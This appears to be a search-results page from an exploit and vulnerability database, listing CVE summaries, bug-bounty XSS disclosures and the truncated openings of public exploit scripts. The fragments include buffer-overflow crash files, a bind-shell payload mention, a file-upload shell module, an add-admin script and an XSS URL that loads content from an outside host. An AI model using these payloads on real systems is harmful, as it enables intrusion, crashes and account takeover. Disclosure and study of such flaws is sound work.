18 matches found
CVE-2023-53047
In the Linux kernel, the following vulnerability has been resolved: tee: amdtee: fix race condition in amdtee_open_session. There is a potential race condition in amdtee_open_session that may lead to use-after-free. For instance, in amdtee_open_session after sess->sess_mask is set, and before setting:...
CE Phoenix 1.0.8.20 Remote Code Execution
Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution RCE Authenticated Date: 2023-11-25 Exploit Author: tmrswrr Category: Webapps Vendor Homepage: CE Phoenix Version: v1.0.8.20 Tested on: Softaculous Demo - CE Phoenix EXPLOIT : import requests from bs4 import BeautifulSoup import sys impor...
Upgraded Q -> 2 from #215 [1679863603573]
Judge has assessed an item in Issue 215 as 2 risk. The relevant finding follows: L1 + L2
paint-inspector.com Cross Site Scripting vulnerability OBB-3172701
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...
Upgraded Q -> M from #471 [1668464969039]
Judge has assessed an item in Issue 471 as M risk. The relevant finding follows: The whole report
Upgraded Q -> M from 135 [1654503723748]
Judge has assessed an item in Issue 135 as Medium risk. The relevant finding follows:
5 Themes for Product Security and Fostering Organizational Growth
In this article we would like to review what Raj Umadas, Product Security Manager at Compass, shared during our recent webinar, highlighting recurring themes that have led to impactful collaborations and organizational risk reduction. Product security (ProdSec) is crucial in the process of growi...
Cuckoo Clock v5.0 - Buffer Overflow
Exploit Title: Cuckoo Clock 5.0 - Buffer Overflow Exploit Author: boku Date: 2020-02-14 Vendor Homepage: https://en.softonic.com/author/pxcompany Software Link: https://en.softonic.com/download/parallaxis-cuckoo-clock/windows/post-download Version: 5.0 Tested On: Windows 10 32-bit Recreate: 1...
ABRT sosreport Privilege Escalation
This module attempts to gain root privileges on RHEL systems with a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured as the crash handler. sosreport uses an insecure temporary directory, allowing local users to write to arbitrary files (CVE-2015-5287). This module uses a symlink...
kodak.com XSS vulnerability
Vulnerable URL: http://www.kodak.com/global/mul/digital/flash/giftguide/giftguide0710/guide/main.swf?xmlfile=http://nsa.is.spying-on.us/k.xml

Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 31015
VIP website...
Wordpress Ajax Load More Plugin 2.8.1.1 Upload Shell Exploit
This Metasploit module exploits an arbitrary file upload in the WordPress Ajax Load More version 2.8.1.1. It allows you to upload arbitrary php files and get remote code execution. This Metasploit module has been tested successfully on WordPress Ajax Load More 2.8.0 with WordPress 4.1.3 on Ubuntu...
Magic Music Editor - .cda Denial of Service
No description provided by source. !/usr/bin/perl Exploit Title: Magic Music Editor .cda DOS Version : All Version Author : AtT4CKxT3rR0r1ST [email protected] Download : http://www.magic-video-software.com/magicmusiceditor/download.html Sp3C!4L Gr34T$ T0 h1ch4m my $file= DOS.cda; my $junk = \x41 x 8000...
Ofilter Player (skin.ini) Local Crash PoC
No description provided by source. !/usr/bin/perl Exploit Title: Ofilter Player skin.ini Local Crash PoC Author:Vulnerability Discovered By Rehan Ahmed [email protected] Tested On: WinXP SP2 my $boom=\x41 x 5000; my $file=skin1.ini; C:\Program Files\OfilterPlayer\skin open$FILE,$file; print $FILE...
Free CD to MP3 Converter 3.1 - Local Buffer Overflow
!usr/bin/perl Exploit Title: Exploit 0day Buffer Overflow Free CD to MP3 Converter 3.1 Date: 09\11\2010 Author: C4SS!0 G0M3S Software Link: http://www.eusing.com/Download/cdtomp3freeware.exe Version: 3.1 Tested on: WIN-XP SP3 Exploit Writted by C4SS!0 G0M3S Home: http://www.invasao.com.br E-mail:...
PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow
PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow !/usr/bin/env python IDEAL Administration 2009 v9.7 Local Buffer Overflow Exploit Found By: DrIDE Usage: Migrate - Open Migration Project - Bind Shell Download: www.pointdev.com Tested On: Windows XPSP3 windows/shellbindtcp - 696 byte...
MixSense 1.0.0.1 DJ Studio - .mp3 Crash
MixSense 1.0.0.1 DJ Studio - .mp3 Crash !/usr/bin/perl -w MixSense 1.0.0.1 DJ Studio .mp3 file Crash Vulnerability Exploit Founded and exploited by prodigy Contact: [email protected] Vendor: MixSense Usage to reproduce the bug: when you created the malicious file, open with Mixsense and...
Globsy 1.0 - Remote File Rewriting
!/usr/bin/php -q '".$filename."' could not be opened."; 39. fwrite$handle, $data or die"Write: The file '".$filename."' could not be writen."; $mode is $POST'mode' and $data = $POST'data' so you can rewrite or create any file / errorreporting0; iniset"defaultsockettimeout",5; $host =...
Pet Grooming Management System 2.0 - Arbitrary Add Admin
Pet Grooming Management System 2.0 - Arbitrary Add Admin !/usr/bin/perl use strict; use LWP::UserAgent; print "-+- Pet Grooming Management System ; print "\nEnter Usernamecreate your admin username: "; chompmy $user=; print "\nEnter Passwordcreate your admin password: "; chompmy $pass=; my $ua =...